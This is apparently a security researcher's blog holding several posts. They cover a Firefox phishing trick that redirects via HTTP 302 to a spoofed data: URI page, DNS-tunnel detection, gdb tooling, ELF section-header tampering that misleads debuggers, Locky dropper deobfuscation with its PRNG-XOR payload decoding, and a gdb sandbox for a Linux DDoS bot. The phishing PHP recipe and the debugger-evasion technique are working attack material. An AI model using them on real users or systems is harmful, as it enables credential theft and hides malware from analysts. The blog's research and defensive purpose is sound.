lundi 12 décembre 2016

Yet another phishing in Firefox with data URI and 302 redirect

1/ Introduction

Little known fact: you can redirect HTTP to a data URI.

2/ Let's have fun with redirect

Create a php file:
 header("Location: data:text,Hello World");  
and serve it for Firefox. In all its glory, Firefox will print "Hello World!"

3/ Enhance with phishing

And yes, you can use HTML instead of pure text. And with HTML, you can do what you want. And the beginning of the data: URI will be printed in the adress bar. Looks good for having fun.
  • First, add HTML capabilities:
  • Second, trick user in address bar, because address bar will print the content of data: scheme: 
  • Third, add some HTML (and clean up)
    <HTML><html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>
  • Fourth, be nice by adding a pretty thing in Tab bar of Firefox: Google

4/ Ready to go:

Create a php file like this:

 $data_uri = "data:text/html,";  
 $decoy = "";  
 $evil_html = "<html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>";  
 $pretty_tab_print = "Google";  
 $redirect_url = $data_uri . $decoy . $evil_html . $pretty_tab_print;  
 header("Location: " . $redirect_url);  

And trick a user to go to this page (you know, phishing stuff, with or any url shortener):

A click on this php file served through a webserver will drive you to:

4/ Is it something new?

Well, yes and no.
Phishing with data URI is known for a veeery long time. A paper has been published some time ago
this is the same idea, I've added the vector with the 302 Redirect.

It's not a big deal, if you're tricked by this, you can be tricked by anything else.

lundi 5 décembre 2016

Finding DNS tunnels by analyzing network captures

DNS tunnels is a method used to exchange data on top of DNS traffic. It's generally used to bypass some filtering equipement to communicate between two hosts.

This article is about the detection of a DNS tunnel. Can we find DNS tunnels by analyzing a pcap offline? We will see that the first basic solution (counting subdomain for a domain) is prone to a high number of false positive when applied to real DNS data. We will then propose another approach wich could help for DNS Tunnel detection

1/ DNS tunnels: the theorical part

The theory here is super easy. If a client in a protected network can send DNS requests and receive response, then you can mount a DNS tunnel.

Clients sends encoded data for a specific subdomain of attacker domain and waits for the answer. This way, data is exchanged. The client just have to pay attention to make unique DNS requests, in order to avoid caching of an intermediary DNS server. Thanks to the multiple type of DNS requests, and to the size of requests, you can get some enough decent bandwidth to do an ssh session.

You can find a lot of resources for building DNS tunnels with a lot of tools: iodine, dnscapy, dnscat2, etc etc.. Those tools provide usually some encryption and helpers to exchange data.

2/ Finding should be super easy by counting requests

The most obvious way to spot a DNS tunnel should be counting the number of subdomain for a specific domain. For each chunk of data, client have to build a new DNS name for the domain owned by attacker.

I captured some DNS traffic while using a DNS tunnel (dnscat2 in that case). I estimate that we can type a lot of harmfull bash commands in dnscat2 in less than 50 DNS requests. Let's use 50 as a threshold: if a domain has more than 50 subdomain, then you can flag it as a DNS tunnel

3/ Ok, let's do it the dirty way: bash+python

There are a lot of way to analyze data, I choose a splitted approach:
  • at first, extract interesting data with tshark and bash to a flat file
  • tshark -2 -r "$1" -R "dns.flags.response == 1" -T fields -e > doms_qry
  • then analyze data with python
This way is convenient for me because I have easy access to the flat file after extraction and before analysis.

mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./ ../dnscat2.pcap
Copied unique domains in doms_qry
Number of domains copied: 244 doms_qry
mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 6 labels

Longest domain name is 235 char long:

######### Following domains ###########
Interesting tld for rank 0
 tux(243 subdomains)

######### Following domains ###########
Interesting tld for rank 1
 dnscat2.tux(243 subdomains)

You should investigate on domains
    dnscat2.tux  (243 subdomains)

That works remarkably well. If you find this kind of data in your DNS logs, you should investigate quickly.

4/ But, does this work in real life? (spoiler: no)

Well, this work in a test lab. Now, how does this work in real?
I have to say that it's incredibly hard to find real DNS data. See end of blog for details, but I had the chance to put hands on two full pcap capture from an university. I have to name and thanks ISCX : data is legit for research and analysis. Really a big thanks.

Now, I use the exact same programs and let's try if we can find DNS tunnels in those captures:

 mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 8 labels fool! Don't make me laugh!
~Soulcalibur - Mitsurugi

Longest domain name is 59 char long:

######### Following domains ###########
Interesting tld for rank 0
 au(54 subdomains); net(1502 subdomains); gov(53 subdomains); jp(96 subdomains); org(195 subdomains); com(3181 subdomains); uk(91 subdomains)

######### Following domains ###########
Interesting tld for rank 1 subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains)

######### Following domains ###########
Interesting tld for rank 2 subdomains); subdomains)

You should investigate on domains  (146 subdomains)  (121 subdomains)  (105 subdomains)  (98 subdomains)  (87 subdomains)  (73 subdomains)  (68 subdomains)  (54 subdomains)  (52 subdomains)  (51 subdomains)

OK, so that's a full list of false positive. If I raise the threshold higher, then I can miss some short living DNS tunnel.

I think that we can clearly say that counting the number of subdomain doesn't work in practice.

5/ Can we do better? (spoiler: yes, sort of)

We have some options here:

5/1/ whitelisting domains

I don't like the idea of whitelisting. Usually, maintaining such lists are pita, but it can help you.

5/2/ analyzing only requests of type other than 'A' (and 'AAAA').

Well, you'll end up with a lot of MX and/or SPF records, that's still a good way to lower the noise, but it should help. I didn't see any DNS tunnels relying on A or AAAA type, but hackers have a lot of imagination.

5/3/ calculating entropy of domain.

Yeah, it should works. But you will face other problems: cdn names can look like random, MX name can look totally legit while being DNS data tunnels. More and more file reputations and cloud antivirus relies on TXT DNS requests... and they look totally likes DNS tunnels (a lot of different TXT requests going to the same domain). So, try at your own risks.

5/4/ Analyzing DNS response instead of requests.

It would be a lot better, combined with the previous one. Still, an hacker would be able to use AAAA or A records to exchange data (throughput of tunnel would be lowered by an order of magnitude, but hackers have a lot of time...)

5/5/ Raising threshold

It could work, but we have to agree on a number not to high, not to low. In the end, we must rely to human analysis, and it can't work that way.

6/ Lessons learned

They are some lessons here:

Counting subdomains doesn't work

No, counting subdomains doesn't work at all. It can helps do lower the size of data to analyze, but you can't trust it for sure.

It's hard to grab DNS data (really.) 

Sad but true. If you want to share DNS data with me (or know place where you can have some), I would be grateful. Beware, DNS data is an impressive way to gather metadata and has a lot of privacy concerns.

Parsing DNS data is not that easy. 

Everybody think they know DNS: "you ask a fqdn, you get an IP" and it's WRONG! You can end up with a lot of RR, multiple queries, UDP and TCP, endless CNAME requests, and so on. For this kind of research a flat file is enough, but I have to find better way to parse and analyze this kind of structured data.

...and beyond

You can find a LOT of things inside DNS data (more blog posts to come)

You fool! Don't make me laugh!
~Soulcalibur - Mitsurugi


mardi 20 septembre 2016

Break On Call and Break On Ret under gdb

1/ Adding BOC and BOR for gdb

As a reverse engineer, I like really gdb. It has a lot of cool features and is scriptable through python.

While I was solving a crackme challenge I needed a break on call and a break on ret instructions. I search the web and did not find what I wanted.

So, I developped a boc (break on call) and a bor (break on ret) function and sharing it today.

2/ How it works?

You just have to source a python file and you end up with three commands:
  • boc : activate break on call with boc on or boc off. You can choose by breaking or printing on call by boc break or boc print
  • bor : same commands for break on ret
  • go : if you have selected boc on and/or bor on, typing go will executing the binary until next call or next ret
 $ gdb -nx -q  
 (gdb) source   
 (gdb) boc  
 Status of Break on Call is off/break  
   Change with boc on/off and boc break/print  
 (gdb) bor  
 Status of Break on Ret is off/break  
   Change with bor on/off and bor break/print  
 (gdb) boc on  
 (gdb) boc  
 Status of Break on Call is on/break  
   Change with boc on/off and boc break/print  

3/ Please, just show me the code! 

It's on github
The Readme shows a typical bocbor session.

4/ Enjoy

Feedback, bugs: mail or twitter

mardi 30 août 2016

Don't always trust your debugger blindly : What You See Is not What You Get!

0/ Intro

A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program) (source wikipedia). We can cite IDA or gdb as well known debuggers used in security community.

A debugger is also the security analyst best friend :-) it will help him (or her) to understand what the program is doing. But what if somebody craft an executable file which will show different behaviors between the debugger and the real life?

Let's do that under linux with an ELF binary. ELF is an executable format, supported by IDA and gdb. The format of ELF files is well-known. ELF contains headers, Program Headers and Section Headers.

Program headers are read by kernel when the ELF binary is launched, Section headers are read by debuggers. Theorically, they are the same. Theorically, they said.

Let's start with a very simple Hello World program:
 #include <stdlib.h>  
 const char hello[]="Hello World\n\x00\x03\x00\x00\x00\x01\x00\x02";  
 const char hell[]="Bad, bad World\n";  
 int main(void) {  

Don't pay attention for the garbage at the end of hello[] and the presence of hell[] for now. No need to be an expert to understand what will be printed.

1/ Taking a look Section headers

Let's look at .rodata section, containing the strings, and the relevant asm part in .text:

 mitsurugi@dojo:~/chall/magick$ readelf -x .rodata hello  
 Hex dump of section '.rodata':  
  0x080484e8 03000000 01000200 48656c6c 6f20576f ........Hello Wo  
  0x080484f8 726c640a 00030000 00010002 00426164 rld..........Bad  
  0x08048508 2c206261 6420576f 726c640a 00       , bad World..  
 mitsurugi@dojo:~/chall/magick$ readelf -S hello  
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
  [ 0]          NULL      00000000 000000 000000 00   0  0 0  0 4  
  [15] .rodata      PROGBITS    080484e8 0004e8 00002e 00  A 0  0 4  

And the asm:
 0804842b <main>:  
  804842b:     8d 4c 24 04          lea  0x4(%esp),%ecx  
  804842f:     83 e4 f0             and  $0xfffffff0,%esp  
  8048432:     ff 71 fc             pushl -0x4(%ecx)  
  8048435:     55                   push  %ebp  
  8048436:     89 e5                mov  %esp,%ebp  
  8048438:     51                   push  %ecx  
  8048439:     83 ec 04             sub  $0x4,%esp  
  804843c:     83 ec 0c             sub  $0xc,%esp  
  804843f:     68 f0 84 04 08       push  $0x80484f0  
  8048444:     e8 a7 fe ff ff       call  80482f0 <puts@plt>  
  8048449:     83 c4 10             add  $0x10,%esp  
  804844c:     83 ec 0c             sub  $0xc,%esp  
  804844f:     6a 00                push  $0x0  
  8048451:     e8 ba fe ff ff       call  8048310 <exit@plt>  

puts will print the string located in 0x080484f0, located in .rodata section, which is "Hello World\n\x00<unprinted garbage>"

The Section headers says that you put 0x2e bytes from the offset 0x4e8 at the adress 0x080484e8

Let's change this slightly. Only in section headers, let says that the .rodata sections copy 0x18 bytes from the offset 0x4fd at 0x080484e8.

2/ Who are you, and what are you doing to my Section headers?

We now have a second file, called hello-patched. This file still runs good:
 mitsurugi@dojo:~/chall/magick$ ./hello-patched   
 Hello World  

The relevant part of Section headers are now:
 mitsurugi@dojo:~/chall/magick$ readelf -S hello-patched   
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
  [15] .rodata      PROGBITS    080484e8 0004fd 000018 00  A 0  0 4  

2/1/ IDA gets tricked

Here is the printscreen of IDA disassembling this file:

Well, this can be confusing when you know that ./hello writes "Hello World"

So, what you see with IDA is not what you get (I've tested the Free edition of IDA v5.0 and IDA Pro 6.7)

2/2/ gdb is even more confusing

Ths string is not the same between x/s and puts call :)

 mitsurugi@dojo:~/chall/magick$ gdb -nx -q hello-patched  
 Reading symbols from hello...(no debugging symbols found)...done.  
 (gdb) disass main  
 Dump of assembler code for function main:  
   0x0804842b <+0>:     lea  0x4(%esp),%ecx  
   0x0804842f <+4>:     and  $0xfffffff0,%esp  
   0x08048432 <+7>:     pushl -0x4(%ecx)  
   0x08048435 <+10>:     push  %ebp  
   0x08048436 <+11>:     mov  %esp,%ebp  
   0x08048438 <+13>:     push  %ecx  
   0x08048439 <+14>:     sub  $0x4,%esp  
   0x0804843c <+17>:     sub  $0xc,%esp  
   0x0804843f <+20>:     push  $0x80484f0  
   0x08048444 <+25>:     call  0x80482f0 <puts@plt>  
   0x08048449 <+30>:     add  $0x10,%esp  
   0x0804844c <+33>:     sub  $0xc,%esp  
   0x0804844f <+36>:     push  $0x0  
   0x08048451 <+38>:     call  0x8048310 <exit@plt>  
 End of assembler dump.  
 (gdb) x/s 0x80484f0  
 0x80484f0 <hello>:     "Bad, bad World\n"  
 (gdb) run  
 Starting program: /home/mitsurugi/chall/magick/hello-patched   
 Hello World  
 [Inferior 1 (process 5382) exited normally]  

Ok, that's not really really true: As soon as you run the program, the Section is corrected, and x/s works as expected, but the demo is worth it. Said differently: if you don't run the binary under gdb, you'll get all wrong.

3/ Conclusion

Now think at a crackme, or malware using this technique. Static Analysts will get lost, without even noticing it :-)

Well, nothing new here: if the same information can be picked from two different places, you can be sure there will be problems.
The fact that Section headers can be changed is known since a very long time, I've just wanted to play a bit with it and manipulate ELF format. The idea of this blogpost has born in my mind after filling a bug I've had with radare2.
You can read another blogpost here with some mitigations in bonus.

If you want to try it with your debugger, you can download a copy of the patched hello file here: (sha256 = f63edf2de7d4edeb02650e3821921ddf3831ee33226cece8f81f31b912e464a5 ) and if it works/fail send me the info, I could compile some results :-)

There are few people who will make mistakes with fire after having once been burned.
~Yamamoto Tsunetomo

vendredi 29 juillet 2016

Update about #Locky xoring data scheme

1/ Intro

This post is a follow-up of this one:

The malware in question is Locky.

2/ Another Locky

Somebody sends me other Locky's zip files and I quickly figured that the core functionalities are the same
  • a .wsf in a zip file (wsf format slightly changed, so my prog in github does not work anymore)
  • some layer of obfuscation
  • all variables are named different, but the structure and functions are the same
  • The downloaded file is XOR-ed with values coming from a PRNG function
  • the PRNG seed has changed

This blogpost will talk about the PRNG.


Wikipedia to the rescue:
A pseudorandom number generator (PRNG) is an algorithm for generating a sequence of numbers whose properties approximate the properties of sequences of random numbers. The PRNG-generated sequence is not truly random, because it is completely determined by a relatively small set of initial values, called the PRNG's seed. (...) pseudorandom number generators are important in practice for their speed in number generation and their reproducibility.

And that's it. I think this is a really interesting move because the file downloaded over HTTP looks like random data. Here is the entropy for the file (made with binwalk):

You can compare with the file, once XOR-ed :

This is an interesting way to avoid analysis.
All the network probes only see random data. No particuliar header, no pattern to match.
No static key either (XORed file with static key doesn't see their entropy changing a lot and key can be retrieved).
You can eventually block file downloaded over HTTP when they have no known header and are around 200kB but it's not really precise.

4/ Get the seed

In my previous blogspot, I just copy paste the prng function, with the seed.
If you want to quickly get the seed, you can grep for mash(<data>) in the .wsf file, once extracted from the zip and unobfuscate.

Everything then is the same: generates more than 200k of pseudo random numbers, then XOR the file:
 mitsurugi@dojo:~/chall/infected$ js24 uhe_prng.js > prng_js   
 mitsurugi@dojo:~/chall/infected$ ./ cj937f7l  
 mitsurugi@dojo:~/chall/infected$ file cj937f7l cj937f7l-xored   
 cj937f7l:    data  
 cj937f7l-xored: PE32 executable (GUI) Intel 80386, for MS Windows  

5/ Conclusions and questions

I think that everything is not said in the case of Locky. When I read interesting analysis like the one in malwarelabs, I don't understand why they don't ran into the XOR part. No mention about the XOR: they found URL in the wsf file, then they got an .exe file (wut?).
Is there many campaigns, some with exe file other with XOR-ed one? As the URLs mentioned in malwarelabs post are not available anymore, I can't tell :-/

And if you got another samples to share, I'm still willing to take a look :-)

Courage first; power second; technique third.

lundi 18 juillet 2016

Analyzing zip with .wsf file inside

0/ Intro

Between the 13 and 16 of july, I've received of lot of spams, all based
on the same, now classical, pattern. A mail body with wording like:
"How is it going?
Please find attached document you asked for and the latest payments report
Hope that helps. Drop me a line if there is anything else you want to know"


"Please find the reference letter I attached."

and a zip file attached containing one file ending in .wsf

 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   29295 2016-07-15 11:09  spreadsheet_87a4..wsf  
 ---------           -------  
   29295           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   28380 2016-07-15 11:17  spreadsheet_7ff..wsf  
 ---------           -------  
   28380           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l   
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   71060 2016-07-14 11:19  spreadsheet_17f5..wsf  
 ---------           -------  
   71060           1 file  

1/ stage 1 - unzip and get the script

All of the .wsf I saw looks more or less the same:

We have a job declaration, then a very long var (I snipped it for brievety, the line is more than 28000 chars long). This var is just a concatenation of all strings, and in the end, it's reversed.

In order to analyze it, you can copy/paste this var in a python file, and just reverse it:
 #! /usr/bin/python  
 aFusa0arM = ';}\n\r;)('+']fJU (... snipped +28000 chars for brievety ...)
 Fo'+'Tev" = '+'jXO rav'+'\n\r;"" +'+' "eli" '+'= tI ra'+'v\n\r;"" '+'+ "esol'+'c" = 0q'+'O rav';
 print aFusa0arM[::-1]  

2/ stage 2 - unobfuscate the javascript

The javascript file is 700 lines long. A quick glance at it reveals the obfuscation.

2/1/ Obfuscation : use of variables

The code relies heavily of variables.There is a lot of affectation:

 var VYd = "ct" + "";  
 var ZMv = "je" + "";  
 var UJd = "teOb" + "";  
 var AYe0 = "ea" + "";  
 var Co7 = "Cr" + "";  

Then, later on:
 var IUh=WScript[Co7 + AYe0 + UJd + ZMv + VYd]  

2/2/ Obfuscation : use of useless functions - 1

We see also a lot of useless function which produce in output the input given:

 function Xr1(WDv){return WDv;};  
 function Wu6(Jw3){return Jw3;};  

And then, it's use:
 IUh[OEc2 + ZBb4](Yr2[Yc8 + USr + Wu6(En) + Gt2]);  

Still, it's just basic obfuscation

2/3/ Obfuscation : use of useless functions - 2

There is another use of useless function. They are called only once, and produce a fixed output. We can find them from time to time:

 var SWh3=[Ww + NBp4 + (function BEs0(){return Xk6;}()) + IHx1 + QMa + CAi2, JRu9(QVt0) + Ir4 + MIs + XKm + Vo];  

The SWh3 var can be simplified like:

 var SWh3=[Ww + NBp4 + Xk6 + IHx1 + QMa + CAi2, QVt0 + Ir4 + MIs + XKm + Vo];  

2/4/ Unobfuscate

That's not really hard. Load all vars, then replace them in expression, remove all useless functions, and calculate the strings.

3/ part 2 - unobfuscation

Once the vars renamed, we can see the big picture of the file:

3/1/ vars declaration

The file begins with almost 700 lines of var declaration.

But only one line is really interesting:
 var VVq=[Jj+Qo5 + ZKy+(function PGr3(){return STa5;}())+ASs2 +   
 (function ICe1(){return XOl;}())+Aq5+MDs6 + Ty9+GZq + Pe+Pa1 +   
 Mp4+Xr1(Rq8)+(function WXz(){return Xw5;}()),   
 (function Ni8(){return Jj;}())+Eb+Lp0+Zv+Gu+RSq + JXa+Jv+Ne+  
 Wp + Yg+Ov + Kz1+RZl8+BBv + COk+IYz, Qe+Kg7+Em+Uc +   
 (function Ci(){return KKd1;}())+(function PJm6(){return Iq0;}())+  
 FWe(MAp7)+Uq3+Xv1 + Mf + DOo6+Nm(TEz5)+Ex5];  

Which can be read as:
var VVq=[element1, element2, element3]

this declares a table of three elements. After search and replace vars, we can read:

3/2/ a PRNG

 function uheprng()  
 function rawprng()  
 function Mash()  
If you google this, you can find that's a random number generator. It will be used later.

3/3/ The juicy part (vars unobfuscated)

 var IUh=WScript[CreateObject](ADODB.Stream);  
 IUh[SaveToFile](DJt9, Kn5);  
 var GHq4=Nh(DJt9); // Ok  
 GHq4=Zy(GHq4);   // This function is important  
 if (GHq4[length] < 100 * 1024 || GHq4[length] > 230 * 1024 || !ZZr(GHq4))  
   STn /* H */(Vh9, GHq4);  // it renames the file with .exe  
 catch (e) {break;};  
 Sn[Run](Vh9 + " 321");   //It runs the exe file with 321 as argument  

3/4/ the Zy function

the Zy() function is interesting:
 function Zy(WPx8)  
   var NKh;  
   var Je = uheprng();  
   for (var KFh4=0; KFh4 < WPx8[length]; KFh4++)  
     WPx8[KFh4] ^= Je(256);  
 (other stuff...)  

We can see that it XOR all bytes with the prng initialized to the value 256.

3/5/ The NH() and STn /* H  */() functions

Those functions looks more or less the same. It opens a file, then do byte translations if charCode > 128.
Maybe I'm missing something, but we don't need that to unobfuscate the exe file.

4/ Decrypt exe file

We have the download URLs, a wget is enough to get the file.
The hard part is to generate all the pseudo random numbers. I choose the easy way: Copy paste the PRNG function in a js file, then generate enough pseudo random numbers to use them later:

 function uheprng() {return (function() {  
 var o = 48, c = 1, p = o, s = new Array(o);  
 var i,j;  
 var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";  
 var mash = Mash();  
 for (i = 5806 - 5806; i < o; i++) s[i] = mash(0.598538);  
 mash = null;  
 var random = function( range ) {  
 return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));  
 function rawprng() {   
 if (++p >= o) p = 0;  
 var t = (482628 * 3 + 320979) * s[p] + c * 2.3283064365386963e-10;  
 return s[p] = t - (c = t | 0);  
 }return random;}());};  
 function Mash() {   
 var n = 0xefc8249d;  
 var mash = function(data) {  
 if ( data ) {  
 data = data.toString();  
 for (var i = 0; i < data.length; i++) {  
 n += data.charCodeAt(i);  
 var h = 0.02519603282416938 * n;  
 n = h >>> 0;  
 h -= n;  
 h *= n;  
 n = h >>> 0;  
 h -= n;  
 n += h * 0x100000000;  
 return (n >>> (1 * 0)) * 2.3283064365386963e-10;  
 } else n = 0xefc8249d;  
 return mash;  
 var Je = uheprng()  
 for (var i=0; i<200000; i++){  
 print(Je(256)); }  
and we can save all those numbers in a file:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ js24 UHE_prng.js > prng_js  

Then a wget and an easy python script will get you the exe file:
 for i in p:  
 for i in range(len(data)):  
and we get:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./ 8f72pw  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  

Now, we need somebody brave enough to launch it with 321 as an argument

5/ Automatize all the things

I wrote two python scripts. The first one extracts URLs from the zip file. The second one unxor the file. This is quick&dirty scripts and "It works for me" (tm)

 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./  
 Extracting zip  
 [+] Ok zip contains one file ending in .wsf  
 Get obfusctated js  
 [+] Assigning a long var, seems good  
 [+] We have to reverse the string  
 Parsing obfuscated and getting URLs  
 [+] printing download URLs  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ wget -q http://mana114[.]  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./ iqfywp  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  

  • The python file does an eval() for concatenating all vars. It's considered dangerous. Use at your own risk.
  • Some zip file are not exactly the same and my parser doesn't handle those. The logic behind is the same, but you will have to do analysis by hand. For what I saw, it's the same logic: unxor a file with a PRNG
  • Be aware that those scripts relies on a very small subset of zipfile and relies on a lot of assumptions. 
  • Be aware that I'm using the PRNG with 256 as a fixed value. If its change, the unxor won't work.
  • If you have some sample which doesn't work, I can take a look.

Here is the link to the github repo:


Our greatest glory is not in never falling, but in rising every time we fall!

You are not judged by the way you fall. 
You are judged by the way you get up after.

lundi 27 juin 2016

Sandboxing a linux malware with gdb

1/ Intro

As I was browsing the other day, I noticed some ELF malware. I choose to analyze one.
At first, it was just to learn some things, but in the end, I've finished by writing a full gdb script which was able to monitor safely all communication of this malware.

2/ Discovery

The file in question is a x86_64 ELF, statically linked, not stripped (!), weighting ~ 200kBytes:
mitsurugi@dojo:~/infected$ file Rx64 
Rx64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
mitsurugi@dojo:~/infected$ ls -l Rx64 
-rw-r--r-- 1 mitsurugi mitsurugi 204783 juin  20 17:54 Rx64

(spoiler off: in the end, I learn that this is DDOSbot/gayfgt family sample)

3/ Reverse

The reversing is not difficult, there is no obfuscation, no anti debug, no persistence. The binary only tries to be stealthy by forking at startup in order to hide its name, and it connects to a C&C, awaiting for commands.

The protocol used is really simple, it's a textual command/response one:
  • regularly, the server sends 'PING', the client replies 'PONG' and vice-versa
  • the server can close the communication
  • the server sets a secret at first use. Any call to the bot without that secret won't be followed by any action. The syntax is "!<secret> <action>"
  • the server can call any shell command
  • the server can call some other functions (flood and scan, basically)
Reverse was done, and an idea appears: why use this malware to connect to its C&C while being monitored?

The logic of the bot can be seen as:

  doing some forks, but only one process remains
  connection to C&C
  A big loop here
    Some code to manage all the forks process if any
    Read data from network
      if PING, send PONG
      if DUP, then exit()
      if starting with !<secret> sh <args> => fork and call shell 
      if starting with !<secret> command args => call function (fork and flood or scan) 

There is nothing really dangerous here. If we just block the shell and flood/scan commands, we end up with a simple client awaiting orders. With this legitimate client, we could connect to the C&C and hear it speak to us. We have to navigate through all the forks, and avoid dangerous commands but with gdb you can put a breakpoint and set $rip elsewhere.

4/ Instrument it

While I was analysing the file, I begun to write a gdb script in order to skip the forks, to print the C&C server, skip all dangerous function. This script became the one I'm showing here.

In the end, every dangerous function is totally neutralized, and I was able to launch it under gdb (and tor) the malware. It connects to the C&C and receive all commands :-)

Here is a live transcript, nothing exciting is showing, just endless PING/PONG reply after a SCANNER OFF (interesting, is the C&C really up?)

root@kali:~# gdb -q Rx64 
Reading symbols from Rx64...(no debugging symbols found)...done.
gdb$ source breakpoints 

#  Starting instrumented binary

                             Nothing ventured, nothing gained.
              You can't do anything without risking something.

Breakpoint 1 at 0x406731
Breakpoint 2 at 0x4067d0
Breakpoint 3 at 0x406466
Breakpoint 4 at 0x40689b
Breakpoint 5 at 0x4069df
Breakpoint 6 at 0x406a4d
Breakpoint 7 at 0x406c4d
Breakpoint 8 at 0x406e0b
gdb$ r
Starting program: /root/Rx64 
Breakpoint 1, 0x0000000000406731 in main ()
main() function
Breakpoint 2, 0x00000000004067d0 in main ()
Skipping all the forks
and the setsid
Breakpoint 3, 0x0000000000406466 in initConnection ()
We got currentServer!
0x417120: ""
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "!* SCANNER OFF\n"
C&C sends a command
Will safely ignore it
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
buf: PONG
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
buf: PONG
Program received signal SIGINT, Interrupt.

5/ Conclusion

The malware is a well known linux malware, called DDOSbot or gayfgt, there is even some source sample available on internet.

Binary and gdb script are available on github:

Talk is easy, action is difficult.
Action is easy, true understanding is difficult